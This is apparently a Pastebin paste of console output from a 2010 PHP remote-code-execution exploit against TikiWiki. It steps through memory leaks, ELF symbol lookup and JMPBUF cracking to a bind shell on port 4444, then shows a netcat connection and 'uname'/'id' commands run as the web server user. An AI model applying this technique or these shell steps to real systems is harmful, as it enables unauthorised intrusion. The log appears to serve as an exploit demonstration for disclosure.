Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $ ./exploit.py -h http://t.testsystem/
- PHP xxx() Remote Code Execution Exploit (TikiWiki Version)
- Copyright (C) 2010 Stefan Esser/SektionEins GmbH
- *** DO NOT DISTRIBUTE ***
- [+] Connecting to determine wordsize
- [+] Wordsize is 32 bit
- [+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x
- [+] PHP version is 5.3.x
- [+] Connecting to determine XXX version
- [+] PHP version >= 5.3.2
- [+] Determining endianess of system
- [+] System is little endian
- [+] Leaking address of std_object_handlers
- [+] Found std_object_handlers address to be 0xb76e84a0
- [+] Leaking std_object_handlers
- [+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)
- [+] Optimized to 0xb74008f0
- [+] Scanning for executable header
- [+] ELF header found at 0xb73ab000
- [+] Retrieving and parsing ELF header
- [+] Retrieving program headers
- [+] Retrieving ELF string table
- [+] Looking up ELF symbol: executor_globals
- [+] Found executor_globals at 0xb76fe280
- [+] Looking up ELF symbol: php_execute_script
- [+] Found php_execute_script at 0xb75386c0
- [+] Looking up ELF symbol: zend_eval_string
- [+] Found zend_eval_string at 0xb7586580
- [+] Searching JMPBUF in executor_globals
- [+] Found JMPBUF at 0xbfcc64b4
- [+] Attempt to crack JMPBUF
- [+] Determined stored EIP value 0xb753875a from pattern match
- [+] Calculated XORER 0x68ab06ea
- [+] Unmangled stored ESP is 0xbfcc5470
- [+] Checking memory infront of JMPBUF for overwriting possibilities
- [+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline
- [+] Returning into PHP... Spawning a shell at port 4444
- ...
- $ nc t.testsystem 4444
- Welcome to the PHPShell 5/22/2010 1:27 am
- system("uname -a");
- Linux fedora13x86 2.6.33.4-95.fc13.i686.PAE #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux
- system("id");
- uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0
- ...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement